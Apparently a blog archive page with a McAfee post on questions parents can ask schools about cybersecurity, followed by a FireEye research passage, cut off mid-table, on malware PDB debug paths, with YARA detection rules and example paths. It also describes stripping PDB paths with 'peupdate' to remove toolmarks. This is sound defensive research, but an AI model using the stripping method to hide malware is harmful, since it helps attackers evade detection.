Monthly Archives: August 2019

7 Questions to Ask Your Child’s School About Cybersecurity Protocols

Just a few weeks into the new school year and, already, reports of malicious cyberattacks in schools have hit the headlines. While you’ve made digital security strides in your home, what concerns if any should you have about your child’s data being compromised at school?

There’s a long and short answer to that question. The short answer is don’t lose sleep (it’s out of your control) but get clarity and peace of mind by asking your school officials the right questions. 

The long answer is that cybercriminals have schools in their digital crosshairs. According to a recent report in The Hill, school districts are becoming top targets of malicious attacks, and government entities are scrambling to fight back. These attacks are costing school districts (taxpayers) serious dollars and costing kids (and parents) their privacy.


Prime Targets

According to one report, a U.S. school district becomes the victim of cyberattack as often as every three days. The reason for this is that cybercriminals want clean data to exploit for dozens of nefarious purposes. The best place to harvest pure data is schools where social security numbers are usually unblemished and go unchecked for years. At the same time, student data can be collected and sold on the dark web. Data at risk include vaccination records, birthdates, addresses, phone numbers, and contacts used for identity theft. 

Top three cyberthreats

The top three threats against schools are data breaches, phishing scams, and ransomware. Data breaches can happen through phishing scams and malware attacks that could include malicious email links or fake accounts posing as acquaintances. In a ransomware attack, a hacker locks down a school’s digital network and holds data for a ransom. 

Over the past month, hackers have hit K-12 schools in New Jersey, New York, Wisconsin, Virginia, Oklahoma, Connecticut, and Louisiana. Universities are also targeted.

In the schools impacted, criminals were able to find loopholes in their security protocols. A loophole can be an unprotected device, a printer, or a malicious email link opened by a new employee. It can even be a calculated scam like the Virginia school duped into paying a fraudulent vendor $600,000 for a football field. The cybercrime scenarios are endless. 

7 key questions to ask

  1. Does the school have a data security and privacy policy in place as well as cyberattack response plan?
  2. Does the school have a system to educate staff, parents, and students about potential risks and safety protocols? 
  3. Does the school have a data protection officer on staff responsible for implementing security and privacy policies?
  4. Does the school have reputable third-party vendors to ensure the proper technology is in place to secure staff and student data?
  5. Are data security and student privacy a fundamental part of onboarding new school employees?
  6. Does the school create backups of valuable information and store them separately from the central server to protect against ransomware attacks?
  7. Does the school have any new technology initiatives planned? If so, how will it address student data protection?

The majority of schools are far from negligent. Leaders know the risks, and many have put recognized cybersecurity frameworks in place. Also, schools have the pressing challenge of 1) providing a technology-driven education to students while at the same time, 2) protecting student/staff privacy and 3) finding funds to address the escalating risk.

Families can add a layer of protection to a child’s data while at school by making sure devices are protected in a Bring Your Own Device (BYOD) setting. Cybersecurity is a shared responsibility. While schools work hard to implement safeguards, be sure you are taking responsibility in your digital life and equipping your kids to do the same. 

 

The post 7 Questions to Ask Your Child’s School About Cybersecurity Protocols appeared first on McAfee Blogs.

Definitive Dossier of Devilish Debug Details – Part One: PDB Paths and Malware

Have you ever wondered what goes through the mind of a malware author? How they build their tools? How they organize their development projects? What kind of computers and software they use? We took a stab and answering some of those questions by exploring malware debug information.

We find that malware developers give descriptive names to their folders and code projects, often describing the capabilities of the malware in development. These descriptive names thus show up in a PDB path when a malware project is compiled with symbol debugging information. Everyone loves an origin story, and debugging information gives us insight into the malware development environment, a small, but important keyhole into where and how a piece of malware was born. We can use our newfound insight to detect malicious activity based in part on PDB paths and other debug details.

Welcome to part one of a multi-part, tweet-inspired series about PDB paths, their relation to malware, and how they may be useful in both defensive and offensive operations.

Human-Computer Conventions

Digital storage systems have revolutionized our world but in order to make use of our stored data and retrieve it in an efficient manner, we must organize it sensibly. Users structure directories carefully and give files and folders unique and descriptive names. Often users name folders and files based on their content. Computers force users to label and annotate their data based on the data type, role, and purpose. This human-computer convention means that most digital content has some descriptive surface area, or descriptive “features” that are present in many files, including malware files.

FireEye approaches detection and hunting from many angles, but on FireEye’s Advanced Practices team, we often like to flex on “weak signals.” We like to search for features of malware that are not evil in isolation but uncommon or unique enough to be useful. We create conditional rules that when met are “weak signals” telling us that a subset of data, such as a file object or a process, has some odd or novel features. These features are often incidental outcomes of adversary methods, or modus operandi, that each represent deliberate choices made by malware developers or intrusion operators. Not all these features were meant to be in there, and they were certainly not intended for defenders to notice. This is especially true for PDB paths, which can be described as an outcome of the compilation process, a toolmark left in malware that describes the development environment.

PDBs

A program database (PDB) file, often referred to as a “symbol file,” is generated upon compilation to store debugging information about an individual build of a program. A PDB may store symbols, addresses, names of functions and resources and other information that may assist with debugging the program to find the exact source of an exception or error.

Malware is software, and malware developers are software developers. Like any software developers, malware authors often have to debug their code and sometimes end up creating PDBs as part of their development process. If they do not spend time debugging their malware, they risk their malware not functioning correctly on victim hosts, or not being able to successfully communicate with their malware remotely.

How PDB Paths are Made (the birds and the PDBs?)

But how are PDBs created and connected to programs? Let’s examine the formation of one PDB path through the eyes of a malware developer and blogger, the soon-to-be-infamous “smiller.”

Smiller has a lot of programming projects and organizes them in an aptly labeled folder structure on his computer. This project is for a shellcode loader embedded in an HTML Application (HTA) file, and the developer stores it quite logically in the folder:

D:\smiller\projects\super_evil_stuff\shellcode\


Figure 1: The simple “Test” project code file “Program.cs” which embeds a piece of shellcode and a launcher executable within an HTML Application (HTA) file


Figure 2: The malicious Visual Studio solution HtaDotnet and corresponding “Test” project folder as seen through Windows Explorer. The names of the folders and files are suggestive of their functionalities

The malware author then compiles their “Test” project Visual Studio in a default “Debug” configuration (Figure 3) and writes out Test.exe and Test.pdb to a subfolder (Figure 4).


Figure 3: The Visual Studio output of a default compiling configuration


Figure 4: Test.exe and Test.pdb are written to a default subfolder of the code project folder

In the Test.pdb file (Figure 5) there are references to the original path for the source code files along with other binary information for use in debugging.


Figure 5: Test.pdb contains binary debug information and references to the original source code files for use in debugging

During the compilation, the linker program associates the PDB file with the built executable by adding an entry into the IMAGE_DEBUG_DIRECTORY specifying the type of the debug information. In this case, the debug type is CodeView and so the PDB path is embedded under IMAGE_DEBUG_TYPE_CODEVIEW portion of the file. This enables a debugger to locate the correct PDB file Test.pdb while debugging Test.exe.


Figure 6: Test.exe as shown in the PEview utility, which easily parses out the PDB path from the IMAGE_DEBUG_TYPE_CODEVIEW section of the executable file

PDB Path in CodeView Debug Information

CodeView Structure

The exact format of the debug information may vary depending on compiler and linker and the modernity of one’s software development tools. CodeView debug information is stored under IMAGE_DEBUG_TYPE_CODEVIEW in the following structure:

Type

Description

DWORD

"RSDS" header

GUID

16-byte Globally Unique Identifier

DWORD

"age" (incrementing # of revisions)

BYTE

PDB path, null terminated

Figure 7: Structure of CodeView debug directory information

Full Versus Partial PDB Path

There are generally two buckets of CodeView PDB paths, those that are fully qualified directory paths and those that are partially qualified, that specify the name of the PDB file only. In both cases, the name of the PDB file with the .pdb extension is included to ensure the debugger locates the correct PDB for the program.

A partially qualified PDB path would list only the PDB file name, such as:

Test.pdb

A fully qualified PDB path usually begins with a volume drive letter and a directory path to the PDB file name such as:

D:\smiller\projects\super_evil_stuff\shellcode\Test\obj\Debug\Test.pdb

Typically, native Windows executables use a partially qualified PDB path because many of the debug PDB files are publicly available on the Microsoft public symbol server, so the fully qualified path is unnecessary in the symbol path (the PDB path). For the purposes of this research, we will be mostly looking at fully qualified PDB paths.

Surveying PDB Paths in Malware

In Operation Shadowhammer, which has a myriad of connections to APT41, one sample had a simple, yet descriptive PDB path: “D:\C++\AsusShellCode\Release\AsusShellCode.pdb

The naming makes perfect sense. The malware was intended to masquerade as Asus Corporation software, and the role of the malware was shellcode. The malware developer named the project after the function and role of the malware itself.

If we accept that the nature of digital data forces developers into these naming conventions, we figured that these conventions would hold true across other threat actors, malware families, and intrusion operations. FireEye’s Advanced Practices team loves to take seemingly innocuous features of an intrusion set and determine what about these things is good, bad and ugly. What is normal, and what is abnormal? What is globally prevalent and what is rare? What are malware authors doing that is different from what non-malware developers are doing? What assumptions can we make and measure?

Letting our curiosity take the wheel, we adapted the CodeView debug information structure into a regular expression (Figure 8) and developed Yara rules (Figure 9) to survey our data sets. This helped us identify commonalities and enabled us to see which threat actors and malware families may be “detectable” based only on features within PDB path strings.


Figure 8: A Perl-compatible regular expression (PCRE) adaptation of the PDB7 debug information in an executable to include a specific keyword


Figure 9: Template Yara rule to search for executables with PDB files matching a keyword

PDB Path Showcase: Malware Naming Conventions

We surveyed 10+ million samples in our incident response and malware corpus, and we found plenty of common PDB path keywords that seemed to transcend different sources, victims, affected regions, impacted industries, and actor motivations. To help articulate the broad reach of malware developer commonalities, we detail a handful of the stronger keywords along with example PDB paths, with represented malware families and threat groups where at least one sample has the applicable keyword.

Please note that the example paths and represented malware families and groups are a selection from the total data set, and not necessarily correlated, clustered or otherwise related to each other. This is intended to illustrate the wide presence of PDB paths with keywords and how malware developers, irrespective of origin, targets and motivations often end up using some of the same words in their naming. We believe that this commonality increases the surface area of malware and introduces new opportunities for detection and hunting.

PDB Path Keyword Prevalence

Keyword

Families and Groups Observed

Example PDB Path

anti

RUNBACK, HANDSTAMP, LOKIBOT, NETWIRE, DARKMOON, PHOTO, RAWHIDE, DUCKFAT, HIGHNOON, DEEPOCEAN, SOGU, CANNONFODDER
APT10, APT24, APT41, UNC589, UNC824, UNC969, UNC765

H:\RbDoor\Anti_winmm\AppInit\AppInit\Release\AppInit.pdb

attack

 

MINIASP, SANNY, DIRTCHEAP, ORCUSRAT
APT1, UNC776, UNC251. UNC1131

 

E:\C\Attack\mini_asp-0615\attack\MiniAsp3\Release\MiniAsp.pdb

backdoor

PACMAN, SOUNDWAVE, PHOTO, WINERACK, DUALGUN

APT41, APT34, APT37, UNC52, UNC1131, APT40

Y:\Hack\backdoor\3-exe-attack\temp\UAC_Elevated\win32\UAC_Elevated.pdb

 

bind

 

SCREENBIND, SEEGAP, CABLECAR, UPDATESEE, SEEDOOR, TURNEDUP, CABROCK, YABROD, FOXHOLE

UNC373, UNC510, UNC875, APT36, APT33, APT5, UNC822

C:\Documents and Settings\ss\桌面\tls\scr\bind\bind\Release\bind.pdb

bypass

 

POSHC2, FIRESHADOW, FLOWERPOT, RYUK, HAYMAKER, UPCONTROL, PHOTO, BEACON, SOGU

APT10, APT34, APT21, UNC1289, UNC1450

C:\Documents and Settings\Administrator\桌面\BypassUAC.VS2010\Release\Go.pdb

downloader

 

SPICYBEAN, GOOSEDOWN, ANTFARM, BUGJUICE, ENFAL, SOURFACE, KASPER, ELMER, TWOBALL, KIBBLEBITS

APT28, UNC1354, UNC1077, UNC27, UNC653, UNC1180, UNC1031

Z:\projects\vs 2012\Inst DWN and DWN XP\downloader_dll_http_mtfs\Release\downloader_dll_http_mtfs.pdb

dropper

 

CITADEL, FIDDLELOG, SWIFTKICK, KAYSLICE, FORMBOOK, EMOTET, SANNY, FIDDLEWOOD, DARKNEURON, URSNIF, RUNOFF

UNC776, UNC1095, APT29, APT36, UNC964, UNC1437, UNC849

D:\Task\DDE Attack\Dropper_Original\Release\Dropper.pdb

exploit

 

TRICKBOT, RUNBACK, PUNCHOUT, QANAT, OZONERAT

UNC1030, APT39, APT34, FIN6

w:\modules\exploits\littletools\agent_wrapper\release\
12345678901234567890123456789012345678\wrapper3.pdb

fake

 

FIRESHADOW

UNC1172, APT39, UNC822

D:\Work\Project\VS\house\Apple\Apple_20180115\Release\FakeRun.pdb

 

fuck

 

TRICKBOT, CEREAL, KRYPTONITE, SUPERMAN

APT17, UNC208, UNC276

E:\CODE\工程文件\20110505_LEVNOhard\CODE\AnyRat\FuckAll'sUI\bin\FuckAll.pdb

 

hack

 

PHOTO, KILLDEVIL, NETWIRE, PACMAN, BADSIGN, TRESOCHO, BADGUEST, GH0ST, VIPSHELL

UNC1152, APT40, UNC78, UNC874, UNC52, UNC502, APT33, APT8

C:\Users\Alienware.DESKTOP-MKL3QDN\Documents\Hacker\memorygrabber - ID\memorygrabber\obj\x86\Debug\vshost.pdb

 

hide

 

FRESHAIR, DIRTYWORD, GH0ST, DARKMOON, FIELDGOAL, RAWHIDE, DLLDOOR, TRICKBOT, 008S, JAMBOX, SOGU, CANDYSHELL

APT26, APT40, UNC213, APT26, UNC44, UNC53, UNC282

c:\winddk\6001.18002\work\hideport\i386\HidePort.pdb

hook

 

GEARSHIFT, METASTAGE, FASTPOS, HANDSTAMP, FON, CLASSFON, WATERFAIRY, RATVERMIN

UNC842, UNC1197, UNC1040, UNC969

D:\รายงาน\C++ & D3D & Hook & VB.NET & PROJECT\Visual Studio 2010\CodeMaster OnlyTh\Inject_Win32_2\Inject Win32\Inject Win32\Release\OLT_PBFREE.pdb

 

inject

 

SKNET, KOADIC, ISMAGENT, FULLTRUNK, ZZINJECT, ENFAL, RANSACK, GEARSHIFT, LOCKLOAD, WHIPSNAP, BEACON, CABROCK, HIGHNOON, DETECT, THREESNEAK, FOXHOLE

UNC606, APT10, APT34, APT41, UNC373, APT31, APT34, APT19, APT1, UNC82, UNC1168, UNC1149, UNC575

E:\0xFFDebug\My Source\HashDump\Release\injectLsa.pdb

install

 

FIRESHADOW, SCRAPMINT, BRIGHTCOMB, WINERACK, SLUDGENUDGE, ANCHOR, EXCHAIN, KIBBLEBITS, ENFAL, DANCEPARTY, SLIMEGRIME, DRABCUBE, EXCHAIN, DIMWIT, THREESNEAK, GOOGONE, STEW, LOWLIGHT, QUASIFOUR, CANNONFODDER, EASYCHAIR, ONETOFOUR, DEEPOCEAN, BRIGHTCREST, LUMBERJACK, EVILTOSS, BRIGHTCYAN, PEKINGDUCK, SIDEVIEW, BOSSNAIL

UNC869, UNC385, UNC228, APT5, UNC229, APT26, APT37, UNC432, APT18, UNC27, APT6, UNC1172, UNC593, UNC451, UNC875, UNC53

i:\LIE_SHOU\URL_CURUN-A\installer\Release\jet.pdb

keylog

 

LIMITLESS, ZZDROP, WAVEKEY, FIDDLEKEYS, SKIDHOOK, HAWKEYE, BEACON, DIZZYLOG, SOUNDWAVE

APT37, UNC82, UNC1095, APT1, APT40

D:\TASK\ProgamsByMe(2015.1~)\MyWork\Relative Backdoor\KeyLogger_ScreenCap_Manager\Release\SoundRec.pdb

payload

 

POSHC2, SHAKTI, LIMITLESS, RANSACK, CATRUNNER, BREAKDANCE, DARKMOON, METERPRETER, DHARMA, GAMEFISH, RAWHIDE, LIGHTPOKE

UNC915, UNC632, UNC1149, APT28, UNC878

C:\Users\WIN-2-ViHKwdGJ574H\Desktop\NSA\Payloads\windows service cpp\Release\CppWindowsService.pdb

 

shell

 

SOGU, RANSACK, CARBANAK, BLACKCOFFEE, SIDEWINDER, PHOTO, SHIMSHINE, PILLOWMINT, POSHC2, PI, METASTAGE, GH0ST, VIPSHELL, GAUSS, DRABCUBE, FINDLOCK, NEDDYSHELL, MONOPOD, FIREPIPE, URSNIF, KAYSLICE, DEEPOCEAN, EIGHTONE, DAYJOB, EXCALIBUR, NICECATCH

UNC48, UNC1225, APT17, UNC1149, APT35, UNC251, UNC521, UNC8, UNC849, UNC1428, UNC1374, UNC53, UNC1215, UNC964, UNC1217, APT3, UNC671, UNC757, UNC753, APT10, APT34, UNC229, APT18, APT9, UNC124, UNC1559

E:\windows\dropperNew\Debug\testShellcode.pdb

sleep

 

URSNIF, CARBANAK, PILLOWMINT, SHIMSHINE, ICEDID

FIN7

O:\misc_src\release_priv_aut_v2.2_sleep_DATE\my\
src\sdb_test_dll\x64\Release\sdb_test.pdb

spy

 

DUSTYSKY, OFFTRACK, SCRAPMINT, FINSPY, LOCKLOAD, WINDOLLAR

FIN7, UNC583, UNC822, UNC1120

G:\development\Winspy\ntsvc32-93-01-05\x64\Release\ntsvcst32.pdb

trojan

 

ENFAL, IMMINENTMONITOR, MSRIP, GH0ST, LITRECOLA, DIMWIT

UNC1373, UNC366, APT19, UNC1352, UNC27, APT1, UNC981, UNC581, UNC1559

e:\work\projects\trojan\client\dll\i386\Client.pdb

Figure 10: A selection of common keywords in PDB paths with groups and malware families observed and examples

PDB Path Showcase: Suspicious Developer Environment Terms

The keywords that are typically used to describe malware are strong enough to raise red flags, but there are other common terms or features in PDB paths that may signal that an executable is compiled in a non-enterprise setting. For example, any PDB path containing “Users” directory can tell you that the executable was likely compiled on Windows Vista/7/10 and likely does not represent an “official” or “commercial” development environment. The term “Users” is much weaker or lower in fidelity than “shellcode” but as we demonstrate below, these terms are indeed present in lots of malware and can be used for weak detection signals.

PDB Path Term Prevalence

Term

Families and Groups Observed

Example PDB Path

Users

ABBEYROAD, AGENTTESLA, ANTFARM, AURORA, BEACON, BLACKDOG, BLACKREMOTE, BLACKSHADESRAT, BREAKDANCE, BROKEYOLK, BUSYFIB, CAMUBOT, CARDCAM, CATNAP, CHILDSPLAY, CITADEL, CROSSWALK, CURVEBALL, DARKCOMET, DARKMOON, DESERTFALCON, DESERTKATZ, DISPKILL, DIZZYLOG, EMOTET, FIDDLEWOOD, FIVERINGS, FLATTOP, FLUXXY, FOOTMOUSE, FORMBOOK, GOLDENCAT, GROK, GZIPDE, HAWKEYE, HIDDENTEAR, HIGHNOTE, HKDOOR, ICEDID, ICEFOG, ISMAGENT, KASPER, KOADIC, LUKEWARM, LUXNET, MOONRAT, NANOCORE, NETGRAIL, NJRAT, NUTSHELL, ONETOFOUR, ORCUSRAT, POISONIVY, POSHC2, QUASARRAT, QUICKHOARD, RADMIN, RANSACK, RAWHIDE, REMCOS, REVENGERAT, RYUK, SANDPIPE, SANDTRAP, SCREENTIME, SEEDOOR, SHADOWTECH, SILENTBYTES, SKIDHOOK, SLIMCAT, SLOWROLL, SOGU, SOREGUT, SOURCANDLE, TREASUREHUNT, TRENDCLOUD, TRESOCHO, TRICKBOT, TRIK, TROCHILUS, TURNEDUP, TWINSERVE, UPCONTROL, UPDATESEE, URSNIF, WATERFAIRY, XHUNTER, XRAT, ZEUS

APT5, APT10, APT17, APT33, APT34, APT35, APT36, APT37, APT39, APT40, APT41, FIN6, UNC284, UNC347, UNC373, UNC432, UNC632, UNC718, UNC757, UNC791, UNC824, UNC875, UNC1065, UNC1124, UNC1149, UNC1152, UNC1197, UNC1289, UNC1295, UNC1340, UNC1352, UNC1354, UNC1374, UNC1406, UNC1450, UNC1486, UNC1507, UNC1516, UNC1534, UNC1545, UNC1562

C:\Users\Yousef\Desktop\MergeFiles\Loader v0\Loader\obj\Release\Loader.pdb

ConsoleApplication

WindowsApplication

WindowsFormsApplication

 

(Visual Studio default project names)

CROSSWALK, DESERTKATZ, DIZZYLOG, FIREPIPE, HIGHPRIEST, HOUDINI, HTRAN, KICKBACK, LUKEWARM, MOONRAT, NIGHTOWL, NJRAT, ORCUSRAT, REDZONE, REVENGERAT, RYUK, SEEDOOR, SLOAD, SOGU, TRICKBOT, TRICKSHOW

APT1, APT34, APT36, FIN6, UNC251, UNC729, UNC1078, UNC1147, UNC1172, UNC1267, UNC1277, UNC1289, UNC1295, UNC1340, UNC1470, UNC1507

D:\Projects\ByPassAV\ConsoleApplication1\
Release\ConsoleApplication1.pdb

New Folder

HOMEUNIX, KASPER, MOONRAT, NANOCORE, NETWIRE, OZONERAT, POISONIVY, REMCOS, SKIDHOOK, TRICKBOT, TURNEDUP, URLZONE

APT18, APT33, APT36, UNC53, UNC74, UNC672, UNC718, UNC1030, UNC1289, UNC1340, UNC1559

c:\Users\USA\Documents\Visual Studio 2008\Projects\New folder (2)\kasper\Release\kasper.pdb

Copy

DESERTFALCON, KASPER, NJRAT, RYUK, SOGU

UNC124, UNC718, UNC757, UNC1065, UNC1215, UNC1225, UNC1289

D:\dll_Mc2.1mc\2.4\2.4.2 xor\zhu\dll_Mc - Copy\Release\shellcode.pdb

Desktop

AGENTTESLA, AVEO, BEACON, BUSYFIB, CHILDSPLAY, COATHOOK, DESERTKATZ, FIVERINGS, FLATTOP, FORMBOOK, GH0ST, GOLDENCAT, HIGHNOTE, HTRAN, IMMINENTMONITOR, KASPER, KOADIC, LUXNET, MOONRAT, NANOCORE, NETWIRE, NUTSHELL, ORCUSRAT, RANSACK, RUNBACK, SEEDOOR, SKIDHOOK, SLIMCAT, SLOWROLL, SOGU, TIERNULL, TINYNUKE, TRICKBOT, TRIK, TROCHILUS, TURNEDUP, UPDATESEE, WASHBOARD, WATERFAIRY, XRAT

APT5, APT17, APT26, APT33, APT34, APT35, APT36, APT41, UNC53, UNC276, UNC308, UNC373, UNC534, UNC551, UNC572, UNC672, UNC718, UNC757, UNC791, UNC824, UNC875, UNC1124, UNC1149, UNC1197, UNC1352

C:\Users\Develop_MM\Desktop\sc_loader\
Release\sc_loader.pdb

Figure 11: A selection of common terms in PDB paths with groups and malware families observed and examples

PDB Path Showcase: Exploring Anomalies

Outside of keywords and terms, we discovered on a few uncommon (to us) features that may be interesting for future research and detection opportunities.

Non-ASCII Characters

PDB paths with any non-ASCII characters have a high ratio of malware to non-malware in our datasets. The strength of this signal is only because of a data bias in our malware corpus and in our client base. However, if this data bias is consistent, we can use the presence of non-ASCII characters in a PDB path as a signal that an executable merits further scrutiny. In organizations that operate primarily in the world of ASCII, we imagine this will be a strong signal. Below we express logic for this technique in Yara:

rule ConventionEngine_Anomaly_NonAscii
{
    meta:
        author = "@stvemillertime"
    strings:
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,500}[^\x00-\x7F]{1,}[\x00-\xFF]{0,500}\.pdb\x00/
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre
}

Multiple Paths in a Single File

Each compiled program should only have one PDB path. The presence of multiple PDB paths in a single object indicates that the object has subfile executables, from which you may infer that the parent object has the capability to “drop” or “install” other files. While being a dropper or installer is not malicious on its own, having an alternative method of applying those classifications to file objects may be of assistance in surfacing malicious activity. In this example, we can also search for this capability using Yara:

rule ConventionEngine_Anomaly_MultiPDB_Triple
{
    meta:
        author = "@stvemillertime"
    strings:
        $anchor = "RSDS"
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #anchor == 3 and #pcre == 3
}

Outside of a Debug Section

When a file is compiled the entry for the debug information is in the IMAGE_DEBUG_DIRECTORY. Similar to seeing multiple PDB paths in a single file, when we see debug information inside an executable that does not have a debug directory, we can infer that the file has subfile executables, and is likely has dropper or installer functionality. In this rule, we use Yara’s convenient PE module to check the relative virtual address (RVA) of the IMAGE_DIRECTORY_ENTRY_DEBUG entry, and if it is zero we can presume that there is no debug entry and thus the presence of a CodeView PDB path indicates that there is a subfile.

rule ConventionEngine_Anomaly_OutsideOfDebug
{
    meta:
        author = "@stvemillertime"
        description = "Searching for PE files with PDB path keywords, terms or anomalies."
   strings:
        $anchor = "RSDS"
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/
   condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $anchor and $pcre and pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_DEBUG].virtual_address == 0
}

Nulled Out PDB Paths

In the typical CodeView section, we would see the “RSDS” header, the 16-byte GUID, a 4-byte “age” and then a PDB path string. However, we’ve identified a significant number of malware samples where the embedded PDB path area is nulled out. In this example, we can easily see the CodeView debug structure, complete with header, GUID and age, followed by nulls to the end of the segment.

00147880: 52 53 44 53 18 c8 03 4e 8c 0c 4f 46 be b2 ed 9e : RSDS...N..OF....
00147890: c1 9f a3 f4 01 00 00 00 00 00 00 00 00 00 00 00 : ................
001478a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................
001478b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................
001478c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................

There are a few possibilities of how and why a CodeView PDB path may be nulled out, but in the case of intentional tampering, for the purposes of removing toolmarks, the easiest way would be to manually overwrite the PDB path with \x00s. The risk of manual editing and overwriting via hex editor is that doing so is laborious and may introduce other static anomalies such as checksum errors.

The next easiest way is to use a utility designed to wipe out debug artifacts from executables. One stellar example of this is “peupdate” which is designed not only to strip or fabricate the PDB path information, but can also recalculate the checksum, and eliminate Rich headers.  Below we demonstrate use of peupdate to clear the PDB path.


Figure 12: Using peupdate to clear the PDB path information from a sample of malware


Figure 13: The peupdate tampered malware as shown in the PEview utility. We see the CodeView section is still present but the PDB path value has been cleared out

PDB Path Anomaly Prevalence

Anomaly

Families and Groups Observed

Examples

Non-Ascii Characters

008S, AGENTTESLA, BADSIGN, BAGELBYTE, BIRDSEED, BLACKCOFFEE, CANNONFODDER, CARDDROP, CEREAL, CHILDSPLAY, COATHOOK, CURVEBALL, DANCEPARTY, DIMWIT, DIZZYLOG, EARTHWORM, EIGHTONE, ELISE, ELKNOT, ENFAL, EXCHAIN, FANNYPACK, FLOWERPOT, FREELOAD, GH0ST, GINGERYUM, GLASSFLAW, GLOOXMAIL, GOLDENCAT, GOOGHARD, GOOGONE, HANDSTAMP, HELLWOOD, HIGHNOON, ICEFOG, ISHELLYAHOO, JAMBOX, JIMA, KRYPTONITE, LIGHTSERVER, LOCKLOAD, LOKIBOT, LOWLIGHT, METASTAGE, NETWIRE, PACMAN, PARITE, POISONIVY, PIEDPIPER, PINKTRIP, PLAYNICE, QUASARRAT, REDZONE, SCREENBIND, SHADOWMASK, SHORTLEASH, SIDEWINDER, SLIMEGRIME, SOGU, SUPERMAN, SWEETBASIL, TEMPFUN, TRAVELNET, TROCHILUS, URSNIF, VIPER, VIPSHELL
APT1, APT2, APT3, APT5, APT6, APT9, APT10, APT14, APT17, APT18, APT20, APT21, APT23, APT24, APT24, APT24, APT26, APT31, APT33, APT41, UNC20, UNC27, UNC39, UNC53, UNC74, UNC78, UNC1040, UNC1078, UNC1172, UNC1486, UNC156, UNC208, UNC229, UNC237, UNC276, UNC293, UNC366, UNC373, UNC451, UNC454, UNC521, UNC542, UNC551, UNC556, UNC565, UNC584, UNC629, UNC753, UNC794, UNC798, UNC969

I:\RControl\小工具\123\判断加载着\Release\判断加载着.pdb

Multi Path in Single File

AGENTTESLA, BANKSHOT, BEACON, BIRDSEED, BLACKBELT, BRIGHTCOMB, BUGJUICE, CAMUBOT, CARDDROP, CETTRA, CHIPSHOT, COOKIECLOG, CURVEBALL, DARKMOON, DESERTFALCON, DIMWIT, ELISE, EXTRAMAYO, FIDDLELOG, FIDDLEWOOD, FLUXXY, FON, GEARSHIFT, GH0ST, HANDSTAMP, HAWKEYE, HIGHNOON, HIKIT, ICEFOG, IMMINENTMONITOR, ISMAGENT, KASPER, KAZYBOT, LIMITLESS, LOKIBOT, LUMBERJACK, MOONRAT, ORCUSRAT, PLANEDOWN, PLANEPATCH, POSEIDON, POSHC2, PUBNUBRAT, PUPYRAT, QUASARRAT, RABBITHOLE, RATVERMIN, RAWHIDE, REDTAPE, RYUK, SAKABOTA, SAMAS, SAMAS, SEEGAP, SEEKEYS, SKIDHOOK, SOGU, SWEETCANDLE, SWEETTEA, TRAVELNET, TRICKBOT, TROCHILUS, UPCONTROL, UPDATESEE, UROBUROS, WASHBOARD, WHITEWALK, WINERACK, XTREMERAT, ZXSHELL

APT1, APT2, APT17, APT5, APT20, APT21, APT26, APT34, APT36, APT37, APT40, APT41, UNC27, UNC53, UNC218, UNC251, UNC432, UNC521, UNC718, UNC776, UNC875, UNC878, UNC969, UNC1031, UNC1040, UNC1065, UNC1092, UNC1095, UNC1166, UNC1183, UNC1289, UNC1374, UNC1443, UNC1450, UNC1495

Single Sample of TRICKBOT:

D:\MyProjects\spreader\Release\spreader_x86.pdb
D:\MyProjects\spreader\Release\ssExecutor_x86.pdb
D:\MyProjects\spreader\Release\screenLocker_x86.pdb

 

Outside of Debug Section

ABBEYROAD, AGENTTESLA, BEACON, BLACKSHADESRAT, CHIMNEYDIP, CITADEL, COOKIECLOG, COREBOT, CRACKSHOT, DAYJOB, DIRTCHEAP, DIZZYLOG, DUSTYSKY, EARTHWORM, EIGHTONE, ELISE, EXTRAMAYO, FRONTWHEEL, GELCAPSULE, GH0ST, HAWKEYE, HIGHNOON, KAYSLICE, LEADPENCIL, LOKIBOT, METASTAGE, METERPRETER, MURKYTOP, NUTSHELL, ORCUSRAT, OUTLOOKDUMP, PACMAN, POISONIVY, PLANEPATCH, PONY, PUPYRAT, RATVERMIN, SAKABOTA, SANDTRAP, SEADADDY, SEEDOOR, SHORTLEASH, SOGU, SOULBOT, TERA, TIXKEYS, UPCONTROL, WHIPSNAP, WHITEWALK, XDOOR, XTUNNEL

APT5, APT6, APT9, APT10, APT17, APT22, APT24, APT26, APT27, APT29, APT30, APT34, APT35, APT36, APT37, APT40, APT41, UNC20, UNC27, UNC39, UNC53, UNC69, UNC74, UNC105, UNC124, UNC125, UNC147, UNC213, UNC215, UNC218, UNC227, UNC251, UNC276, UNC282, UNC307, UNC308, UNC347, UNC407, UNC565, UNC583, UNC587, UNC589, UNC631, UNC707, UNC718, UNC775, UNC776, UNC779, UNC842, UNC869, UNC875, UNC875, UNC924, UNC1040, UNC1080, UNC1148, UNC1152, UNC1225, UNC1251, UNC1428, UNC1450, UNC1486, UNC1575

 

Nulled Out PDB Paths

HIGHNOON, SANNY, PHOTO, TERA, SOYSAUCE, VIPER, FIDDLEWOOD, BLACKDOG, FLUSHSHOW, NJRAT, LONGCUT

APT41, UNC776, UNC229, UNC177, UNC1267, UNC878, UNC1511

 

 

 

Figure 14: A selection of anomalies in PDB paths with groups and malware families observed and examples

PDB Path Showcase: Outliers, Oddities, Exceptions and Other Shenanigans

The internet is a weird place, and at a big enough scale, you end up seeing things that you never thought you would. Things that deviate from the norms, things that shirk the standards, things that utterly defy explanation. We expect PDB paths to look a certain way, but we’ve run across several samples that did not, and we’re not always sure why. Many of these samples below may be results of errors, corruption, obfuscation, or various forms of intentional manipulation. We’re demonstrating them here to show that if you are attempting PDB path parsing or detection, you need to understand the variety of paths in the wild and prepare for shenanigans galore. Each of these examples are from confirmed malware samples.

Shenanigan

Example PDB Paths

Unicode error

Text Path: C^\Users\DELL\Desktop\interne.2.pdb

